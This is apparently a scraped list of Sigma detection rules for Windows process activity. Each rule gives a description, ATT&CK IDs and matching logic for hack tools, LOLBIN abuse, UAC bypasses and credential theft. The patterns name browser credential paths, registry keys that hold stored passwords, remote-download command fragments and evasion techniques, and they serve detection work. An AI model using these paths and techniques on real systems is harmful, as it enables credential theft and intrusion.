- SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2
- SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef
- SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d
- SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524
- SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b
- SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b
- SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629
- SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358
- SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca
- SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea
- SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172
- SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4
- SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2
- SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66
- SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27
- SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41
- SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1
- SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0
- SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8
- SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d
- SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726
- SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90
- SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5
- SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140
- SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87
- SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892
- SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054
- SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd
- Image|endswith: \PingCastle.exe
- OriginalFileName: PingCastle.exe
- Product: Ping Castle
- CommandLine|contains:
- --scanner aclcheck
- --scanner antivirus
- --scanner computerversion
- --scanner foreignusers
- --scanner laps_bitlocker
- --scanner localadmin
- --scanner nullsession
- --scanner nullsession-trust
- --scanner oxidbindings
- --scanner remote
- --scanner share
- --scanner smb
- --scanner smb3querynetwork
- --scanner spooler
- --scanner startup
- --scanner zerologon
- CommandLine|contains: --no-enum-limit
- CommandLine|contains|all:
- --healthcheck
- --level Full
- CommandLine|contains|all:
- --healthcheck
- '--server '
HackTool - CoercedPotato Execution
- source: sigma
- technicques:
- t1055
Description
Detects the use of CoercedPotato, a tool for privilege escalation
Detection logic
condition: 1 of selection_*
selection_loader_img:
Image|endswith: \CoercedPotato.exe
selection_loader_imphash:
- Imphash:
- a75d7669db6b2e107a44c4057ff7f7d6
- f91624350e2c678c5dcbe5e1f24e22c9
- 14c81850a079a87e83d50ca41c709a15
- Hashes|contains:
- IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6
- IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9
- IMPHASH=14C81850A079A87E83D50CA41C709A15
selection_params:
CommandLine|contains: ' --exploitId '
Wusa.EXE Extracting Cab Files From Suspicious Paths
- source: sigma
- technicques:
Description
Detects usage of the “wusa.exe” (Windows Update Standalone Installer) utility to extract cab using the “/extract” argument from suspicious paths
Detection logic
condition: all of selection_*
selection_paths:
CommandLine|contains:
- :\PerfLogs\
- :\Users\Public\
- :\Windows\Temp\
- \Appdata\Local\Temp\
selection_root:
CommandLine|contains: '/extract:'
Image|endswith: \wusa.exe
Taskkill Symantec Endpoint Protection
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- taskkill
- ' /F '
- ' /IM '
- ccSvcHst.exe
Renamed CURL.EXE Execution
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects the execution of a renamed “CURL.exe” binary based on the PE metadata fields
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_img:
Image|contains: \curl
selection:
- OriginalFileName: curl.exe
- Description: The curl executable
Uncommon Child Processes Of SndVol.exe
- source: sigma
- technicques:
Description
Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_rundll32:
CommandLine|contains: ' shell32.dll,Control_RunDLL '
Image|endswith: \rundll32.exe
selection:
ParentImage|endswith: \SndVol.exe
Service Security Descriptor Tampering Via Sc.EXE
- source: sigma
- technicques:
- t1574
- t1574.011
Description
Detection of sc.exe utility adding a new service with special permission which hides that service.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: sdset
selection_img:
- Image|endswith: \sc.exe
- OriginalFileName: sc.exe
Renamed ZOHO Dctask64 Execution
- source: sigma
- technicques:
- t1036
- t1055
- t1055.001
- t1202
- t1218
Description
Detects a renamed “dctask64.exe” execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_name:
Image|endswith: \dctask64.exe
selection:
Hashes|contains:
- 6834B1B94E49701D77CCB3C0895E1AFD
- 1BB6F93B129F398C7C4A76BB97450BBA
- FAA2AC19875FADE461C8D89DCF2710A3
- F1039CED4B91572AB7847D26032E6BBF
PUA - Wsudo Suspicious Execution
- source: sigma
- technicques:
- t1059
Description
Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator…etc)
Detection logic
condition: 1 of selection_*
selection_cli:
CommandLine|contains:
- -u System
- -uSystem
- -u TrustedInstaller
- -uTrustedInstaller
- ' --ti '
selection_metadata:
- Image|endswith: \wsudo.exe
- OriginalFileName: wsudo.exe
- Description: Windows sudo utility
- ParentImage|endswith: \wsudo-bridge.exe
Renamed Vmnat.exe Execution
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
Detection logic
condition: selection and not 1 of filter_*
filter_rename:
Image|endswith: vmnat.exe
selection:
OriginalFileName: vmnat.exe
Visual Studio NodejsTools PressAnyKey Renamed Execution
- source: sigma
- technicques:
- t1218
Description
Detects renamed execution of “Microsoft.NodejsTools.PressAnyKey.exe”, which can be abused as a LOLBIN to execute arbitrary binaries
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_name:
Image|endswith: \Microsoft.NodejsTools.PressAnyKey.exe
selection:
OriginalFileName: Microsoft.NodejsTools.PressAnyKey.exe
Potential SquiblyTwo Technique Execution
- source: sigma
- technicques:
- t1047
- t1059
- t1059.005
- t1059.007
- t1220
Description
Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- 'format:'
- http
selection_pe:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
- Imphash:
- 1B1A3F43BF37B5BFE60751F2EE2F326E
- 37777A96245A3C74EB217308F3546F4C
- 9D87C9D67CE724033C0B40CC4CA1B206
- Hashes|contains:
- IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E
- IMPHASH=37777A96245A3C74EB217308F3546F4C
- IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206
HackTool - SharpUp PrivEsc Tool Execution
- source: sigma
- technicques:
- t1569
- t1569.002
- t1574
- t1574.005
- t1615
Description
Detects the use of SharpUp, a tool for local privilege escalation
Detection logic
condition: selection
selection:
- Image|endswith: \SharpUp.exe
- Description: SharpUp
- CommandLine|contains:
- HijackablePaths
- UnquotedServicePath
- ProcessDLLHijack
- ModifiableServiceBinaries
- ModifiableScheduledTask
- DomainGPPPassword
- CachedGPPPassword
Potential Browser Data Stealing
- source: sigma
- technicques:
- t1555
- t1555.003
Description
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Detection logic
condition: all of selection_*
selection_cmd:
- CommandLine|contains:
- copy-item
- 'copy '
- 'cpi '
- ' cp '
- 'move '
- move-item
- ' mi '
- ' mv '
- Image|endswith:
- \xcopy.exe
- \robocopy.exe
- OriginalFileName:
- XCOPY.EXE
- robocopy.exe
selection_path:
CommandLine|contains:
- \Amigo\User Data
- \BraveSoftware\Brave-Browser\User Data
- \CentBrowser\User Data
- \Chromium\User Data
- \CocCoc\Browser\User Data
- \Comodo\Dragon\User Data
- \Elements Browser\User Data
- \Epic Privacy Browser\User Data
- \Google\Chrome Beta\User Data
- \Google\Chrome SxS\User Data
- \Google\Chrome\User Data\
- \Kometa\User Data
- \Maxthon5\Users
- \Microsoft\Edge\User Data
- \Mozilla\Firefox\Profiles
- \Nichrome\User Data
- \Opera Software\Opera GX Stable\
- \Opera Software\Opera Neon\User Data
- \Opera Software\Opera Stable\
- \Orbitum\User Data
- \QIP Surf\User Data
- \Sputnik\User Data
- \Torch\User Data
- \uCozMedia\Uran\User Data
- \Vivaldi\User Data
Remotely Hosted HTA File Executed Via Mshta.EXE
- source: sigma
- technicques:
- t1218
- t1218.005
Description
Detects execution of the “mshta” utility with an argument containing the “http” keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- http://
- https://
- ftp://
selection_img:
- Image|endswith: \mshta.exe
- OriginalFileName: MSHTA.EXE
Suspicious ZipExec Execution
- source: sigma
- technicques:
- t1202
- t1218
Description
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Detection logic
condition: run or delete
delete:
CommandLine|contains|all:
- /delete
- Microsoft_Windows_Shell_ZipFolder:filename=
- .zip
run:
CommandLine|contains|all:
- /generic:Microsoft_Windows_Shell_ZipFolder:filename=
- .zip
- '/pass:'
- '/user:'
Taskmgr as LOCAL_SYSTEM
- source: sigma
- technicques:
- t1036
Description
Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
Detection logic
condition: selection
selection:
Image|endswith: \taskmgr.exe
User|contains:
- AUTHORI
- AUTORI
HackTool - SharpImpersonation Execution
- source: sigma
- technicques:
- t1134
- t1134.001
- t1134.003
Description
Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
Detection logic
condition: 1 of selection_*
selection_cli:
- CommandLine|contains|all:
- ' user:'
- ' binary:'
- CommandLine|contains|all:
- ' user:'
- ' shellcode:'
- CommandLine|contains:
- ' technique:CreateProcessAsUserW'
- ' technique:ImpersonateLoggedOnuser'
selection_img:
- Image|endswith: \SharpImpersonation.exe
- OriginalFileName: SharpImpersonation.exe
Use Of The SFTP.EXE Binary As A LOLBIN
- source: sigma
- technicques:
- t1218
Description
Detects the usage of the “sftp.exe” binary as a LOLBIN by abusing the “-D” flag
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -D ..'
- ' -D C:\'
Image|endswith: \sftp.exe
Suspicious Query of MachineGUID
- source: sigma
- technicques:
- t1082
Description
Use of reg to get MachineGuid information
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- SOFTWARE\Microsoft\Cryptography
- '/v '
- MachineGuid
Image|endswith: \reg.exe
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
- source: sigma
- technicques:
- t1127
Description
Detects execution of “aspnet_compiler.exe” with potentially suspicious paths for compilation.
Detection logic
condition: selection
selection:
CommandLine|contains:
- \Users\Public\
- \AppData\Local\Temp\
- \AppData\Local\Roaming\
- :\Temp\
- :\Windows\Temp\
- :\Windows\System32\Tasks\
- :\Windows\Tasks\
Image|contains:
- C:\Windows\Microsoft.NET\Framework\
- C:\Windows\Microsoft.NET\Framework64\
Image|endswith: \aspnet_compiler.exe
Process Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects the execution of “wmic” with the “process” flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
Detection logic
condition: all of selection* and not 1 of filter_*
filter_main_creation:
CommandLine|contains|all:
- call
- create
selection_cli:
CommandLine|contains: process
selection_img:
- Image|endswith: \WMIC.exe
- OriginalFileName: wmic.exe
UAC Bypass Using PkgMgr and DISM
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Detection logic
condition: selection
selection:
Image|endswith: \dism.exe
IntegrityLevel:
- High
- System
ParentImage|endswith: \pkgmgr.exe
Suspicious SysAidServer Child
- source: sigma
- technicques:
- t1210
Description
Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
Detection logic
condition: selection
selection:
ParentCommandLine|contains: SysAidServer
ParentImage|endswith:
- \java.exe
- \javaw.exe
UAC Bypass Using Disk Cleanup
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
Detection logic
condition: selection
selection:
CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:'
IntegrityLevel:
- High
- System
ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Suspicious Process Created Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects WMIC executing “process call create” with suspicious calls to processes such as “rundll32”, “regsrv32”, etc.
Detection logic
condition: selection
selection:
CommandLine|contains:
- rundll32
- bitsadmin
- regsvr32
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
- 'cmd /c '
- 'cmd /k '
- 'cmd /r '
- powershell
- pwsh
- certutil
- cscript
- wscript
- mshta
- \Users\Public\
- \Windows\Temp\
- \AppData\Local\
- '%temp%'
- '%tmp%'
- '%ProgramData%'
- '%appdata%'
- '%comspec%'
- '%localappdata%'
CommandLine|contains|all:
- 'process '
- 'call '
- 'create '
Renamed Visual Studio Code Tunnel Execution
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
Detection logic
condition: (1 of selection_image_* and not 1 of filter_main_image_*) or (1 of selection_parent_*
and not 1 of filter_main_parent_*)
filter_main_image_code:
Image|endswith:
- \code-tunnel.exe
- \code.exe
filter_main_parent_code:
ParentImage|endswith:
- \code-tunnel.exe
- \code.exe
selection_image_only_tunnel:
CommandLine|endswith: .exe tunnel
OriginalFileName: null
selection_image_tunnel_args:
CommandLine|contains|all:
- .exe tunnel
- '--name '
- --accept-server-license-terms
selection_image_tunnel_service:
CommandLine|contains|all:
- 'tunnel '
- service
- internal-run
- tunnel-service.log
selection_parent_tunnel:
CommandLine|contains|all:
- '/d /c '
- \servers\Stable-
- code-server.cmd
Image|endswith: \cmd.exe
ParentCommandLine|endswith: ' tunnel'
Enumeration for 3rd Party Creds From CLI
- source: sigma
- technicques:
- t1552
- t1552.002
Description
Detects processes that query known 3rd party registry keys that holds credentials via commandline
Detection logic
condition: selection
selection:
CommandLine|contains:
- \Software\SimonTatham\PuTTY\Sessions
- \Software\\SimonTatham\PuTTY\SshHostKeys\
- \Software\Mobatek\MobaXterm\
- \Software\WOW6432Node\Radmin\v3.0\Server\Parameters\Radmin
- \Software\Aerofox\FoxmailPreview
- \Software\Aerofox\Foxmail\V3.1
- \Software\IncrediMail\Identities
- \Software\Qualcomm\Eudora\CommandLine
- \Software\RimArts\B2\Settings
- \Software\OpenVPN-GUI\configs
- \Software\Martin Prikryl\WinSCP 2\Sessions
- \Software\FTPWare\COREFTP\Sites
- \Software\DownloadManager\Passwords
- \Software\OpenSSH\Agent\Keys
- \Software\TightVNC\Server
- \Software\ORL\WinVNC3\Password
- \Software\RealVNC\WinVNC4
Renamed Office Binary Execution
- source: sigma
- technicques:
Description
Detects the execution of a renamed office binary
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_names:
Image|endswith:
- \EXCEL.exe
- \excelcnv.exe
- \MSACCESS.exe
- \MSPUB.EXE
- \ONENOTE.EXE
- \ONENOTEM.EXE
- \OUTLOOK.EXE
- \POWERPNT.EXE
- \WINWORD.exe
selection:
- OriginalFileName:
- Excel.exe
- MSACCESS.EXE
- MSPUB.EXE
- OneNote.exe
- OneNoteM.exe
- OUTLOOK.EXE
- POWERPNT.EXE
- WinWord.exe
- Description:
- Microsoft Access
- Microsoft Excel
- Microsoft OneNote
- Microsoft Outlook
- Microsoft PowerPoint
- Microsoft Publisher
- Microsoft Word
- Sent to OneNote Tool
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
- source: sigma
- technicques:
- t1021
- t1021.003
Description
Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the “ActivateMicrosoftApp” Excel DCOM object.
Detection logic
condition: all of selection_*
selection_child:
- OriginalFileName:
- foxprow.exe
- schdplus.exe
- winproj.exe
- Image|endswith:
- \foxprow.exe
- \schdplus.exe
- \winproj.exe
selection_parent:
ParentImage|endswith: \excel.exe
Potential Privilege Escalation via Service Permissions Weakness
- source: sigma
- technicques:
- t1574
- t1574.011
Description
Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
Detection logic
condition: selection
selection:
CommandLine|contains:
- \ImagePath
- \FailureCommand
- \ServiceDll
CommandLine|contains|all:
- ControlSet
- services
IntegrityLevel: Medium
Suspicious Usage Of ShellExec_RunDLL
- source: sigma
- technicques:
Description
Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
Detection logic
condition: all of selection_*
selection_openasrundll:
CommandLine|contains: ShellExec_RunDLL
selection_suspcli:
CommandLine|contains:
- regsvr32
- msiexec
- \Users\Public\
- odbcconf
- \Desktop\
- \Temp\
- Invoke-
- iex
- comspec
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
Detection logic
condition: all of selection_*
selection_sc:
- Image|endswith: \sc.exe
- OriginalFileName: sc.exe
selection_sdset:
CommandLine|contains|all:
- sdset
- D;
selection_trustee:
CommandLine|contains:
- ;IU
- ;SU
- ;BA
- ;SY
- ;WD
Potential Arbitrary File Download Via Cmdl32.EXE
- source: sigma
- technicques:
- t1202
- t1218
Description
Detects execution of Cmdl32 with the “/vpn” and “/lan” flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- /vpn
- /lan
selection_img:
- Image|endswith: \cmdl32.exe
- OriginalFileName: CMDL32.EXE
Potential Rundll32 Execution With DLL Stored In ADS
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:'
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
Suspicious MsiExec Embedding Parent
- source: sigma
- technicques:
- t1218
- t1218.007
Description
Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
Detection logic
condition: selection and not 1 of filter*
filter_splunk_ufw:
CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\
Image|endswith: :\Windows\System32\cmd.exe
filter_vs:
- CommandLine|contains: \DismFoDInstall.cmd
- ParentCommandLine|contains|all:
- '\MsiExec.exe -Embedding '
- Global\MSI0000
selection:
Image|endswith:
- \powershell.exe
- \pwsh.exe
- \cmd.exe
ParentCommandLine|contains|all:
- MsiExec.exe
- '-Embedding '
Parent in Public Folder Suspicious Process
- source: sigma
- technicques:
- t1059
- t1564
Description
This rule detects suspicious processes with parent images located in the C:\Users\Public folder
Detection logic
condition: selection
selection:
CommandLine|contains:
- powershell
- 'cmd.exe /c '
- 'cmd.exe /r '
- 'cmd.exe /k '
- 'cmd /c '
- 'cmd /r '
- 'cmd /k '
- wscript.exe
- cscript.exe
- bitsadmin
- certutil
- mshta.exe
ParentImage|startswith: C:\Users\Public\
Group Membership Reconnaissance Via Whoami.EXE
- source: sigma
- technicques:
- t1033
Description
Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ' /groups'
- ' -groups'
selection_img:
- Image|endswith: \whoami.exe
- OriginalFileName: whoami.exe
Potential DLL Injection Or Execution Using Tracker.exe
- source: sigma
- technicques:
- t1055
- t1055.001
Description
Detects potential DLL injection and execution using “Tracker.exe”
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_msbuild1:
CommandLine|contains: ' /ERRORREPORT:PROMPT '
filter_msbuild2:
ParentImage|endswith:
- \Msbuild\Current\Bin\MSBuild.exe
- \Msbuild\Current\Bin\amd64\MSBuild.exe
selection_cli:
CommandLine|contains:
- ' /d '
- ' /c '
selection_img:
- Image|endswith: \tracker.exe
- Description: Tracker
Data Copied To Clipboard Via Clip.EXE
- source: sigma
- technicques:
- t1115
Description
Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Detection logic
condition: selection
selection:
- Image|endswith: \clip.exe
- OriginalFileName: clip.exe
Persistence Via TypedPaths - CommandLine
- source: sigma
- technicques:
Description
Detects modification addition to the ‘TypedPaths’ key in the user or admin registry via the commandline. Which might indicate persistence attempt
Detection logic
condition: selection
selection:
CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths
Uncommon Child Process Of Defaultpack.EXE
- source: sigma
- technicques:
- t1218
Description
Detects uncommon child processes of “DefaultPack.EXE” binary as a proxy to launch other programs
Detection logic
condition: selection
selection:
ParentImage|endswith: \DefaultPack.exe
HackTool - WinPwn Execution
- source: sigma
- technicques:
- t1046
- t1082
- t1106
- t1518
- t1548
- t1548.002
- t1552
- t1552.001
- t1555
- t1555.003
Description
Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Detection logic
condition: selection
selection:
CommandLine|contains:
- Offline_Winpwn
- 'WinPwn '
- WinPwn.exe
- WinPwn.ps1
HackTool - Jlaive In-Memory Assembly Execution
- source: sigma
- technicques:
- t1059
- t1059.003
Description
Detects the use of Jlaive to execute assemblies in a copied PowerShell
Detection logic
condition: parent_selection and (1 of selection*)
parent_selection:
ParentCommandLine|endswith: .bat
ParentImage|endswith: \cmd.exe
selection1:
CommandLine|contains|all:
- powershell.exe
- .bat.exe
Image|endswith: \xcopy.exe
selection2:
CommandLine|contains|all:
- pwsh.exe
- .bat.exe
Image|endswith: \xcopy.exe
selection3:
CommandLine|contains|all:
- +s
- +h
- .bat.exe
Image|endswith: \attrib.exe
Potential PowerShell Obfuscation Via WCHAR
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects suspicious encoded character syntax often used for defense evasion
Detection logic
condition: selection
selection:
CommandLine|contains: (WCHAR)0x
File Download From Browser Process Via Inline URL
- source: sigma
- technicques:
- t1105
Description
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
Detection logic
condition: all of selection_*
selection_extensions:
CommandLine|endswith:
- .7z
- .dat
- .dll
- .exe
- .hta
- .ps1
- .psm1
- .txt
- .vbe
- .vbs
- .zip
selection_http:
CommandLine|contains: http
selection_img:
Image|endswith:
- \brave.exe
- \chrome.exe
- \msedge.exe
- \opera.exe
- \vivaldi.exe
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
- source: sigma
- technicques:
- t1218
Description
Detects calls to the AtomicTestHarnesses “Invoke-ATHRemoteFXvGPUDisablementCommand” which is designed to abuse the “RemoteFXvGPUDisablement.exe” binary to run custom PowerShell code via module load-order hijacking.
Detection logic
condition: selection
selection:
CommandLine|contains:
- Invoke-ATHRemoteFXvGPUDisablementCommand
- Invoke-ATHRemoteFXvGPUDisableme
Browser Execution In Headless Mode
- source: sigma
- technicques:
- t1105
Description
Detects execution of Chromium based browser in headless mode
Detection logic
condition: selection
selection:
CommandLine|contains: --headless
Image|endswith:
- \brave.exe
- \chrome.exe
- \msedge.exe
- \opera.exe
- \vivaldi.exe
Suspicious File Downloaded From Direct IP Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_seven_zip:
CommandLine|contains: ://7-
selection_flags:
CommandLine|contains:
- 'urlcache '
- 'verifyctl '
selection_http:
CommandLine|contains:
- ://1
- ://2
- ://3
- ://4
- ://5
- ://6
- ://7
- ://8
- ://9
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Potentially Suspicious Child Process Of WinRAR.EXE
- source: sigma
- technicques:
- t1203
Description
Detects potentially suspicious child processes of WinRAR.exe.
Detection logic
condition: all of selection_*
selection_binaries:
- Image|endswith:
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
- OriginalFileName:
- Cmd.Exe
- cscript.exe
- mshta.exe
- PowerShell.EXE
- pwsh.dll
- regsvr32.exe
- RUNDLL32.EXE
- wscript.exe
selection_parent:
ParentImage|endswith: \WinRAR.exe
Uncommon Child Process Of Conhost.EXE
- source: sigma
- technicques:
- t1202
Description
Detects uncommon “conhost” child processes. This could be a sign of “conhost” usage as a LOLBIN or potential process injection activity.
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_conhost:
Image|endswith: :\Windows\System32\conhost.exe
filter_main_empty:
Image: ''
filter_main_null:
Image: null
filter_optional_provider:
Provider_Name: SystemTraceProvider-Process
selection:
ParentImage|endswith: \conhost.exe
OpenWith.exe Executes Specified Binary
- source: sigma
- technicques:
- t1218
Description
The OpenWith.exe executes other binary
Detection logic
condition: selection
selection:
CommandLine|contains: /c
Image|endswith: \OpenWith.exe
Suspicious Sigverif Execution
- source: sigma
- technicques:
- t1216
Description
Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution
Detection logic
condition: selection
selection:
ParentImage|endswith: \sigverif.exe
Potential Cookies Session Hijacking
- source: sigma
- technicques:
Description
Detects execution of “curl.exe” with the “-c” flag in order to save cookie data.
Detection logic
condition: all of selection_*
selection_cli:
- CommandLine|re: \s-c\s
- CommandLine|contains: --cookie-jar
selection_img:
- Image|endswith: \curl.exe
- OriginalFileName: curl.exe
Uncommon Svchost Parent Process
- source: sigma
- technicques:
- t1036
- t1036.005
Description
Detects an uncommon svchost parent process
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_generic:
ParentImage|endswith:
- \Mrt.exe
- \MsMpEng.exe
- \ngen.exe
- \rpcnet.exe
- \services.exe
- \TiWorker.exe
filter_main_parent_empty:
ParentImage:
- '-'
- ''
filter_main_parent_null:
ParentImage: null
selection:
Image|endswith: \svchost.exe
UAC Bypass Using IDiagnostic Profile
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the “IDiagnosticProfileUAC” UAC bypass technique
Detection logic
condition: selection
selection:
IntegrityLevel:
- High
- System
ParentCommandLine|contains: ' /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}'
ParentImage|endswith: \DllHost.exe
ShimCache Flush
- source: sigma
- technicques:
- t1112
Description
Detects actions that clear the local ShimCache and remove forensic evidence
Detection logic
condition: ( selection1a and selection1b ) or ( selection2a and selection2b )
selection1a:
CommandLine|contains|all:
- rundll32
- apphelp.dll
selection1b:
CommandLine|contains:
- ShimFlushCache
- '#250'
selection2a:
CommandLine|contains|all:
- rundll32
- kernel32.dll
selection2b:
CommandLine|contains:
- BaseFlushAppcompatCache
- '#46'
Add Potential Suspicious New Download Source To Winget
- source: sigma
- technicques:
- t1059
Description
Detects usage of winget to add new potentially suspicious download sources
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- 'source '
- 'add '
selection_img:
- Image|endswith: \winget.exe
- OriginalFileName: winget.exe
selection_source_direct_ip:
CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
Webshell Tool Reconnaissance Activity
- source: sigma
- technicques:
- t1505
- t1505.003
Description
Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
Detection logic
condition: 1 of selection_webserver_* and selection_recon
selection_recon:
CommandLine|contains:
- perl --help
- perl -h
- python --help
- python -h
- python3 --help
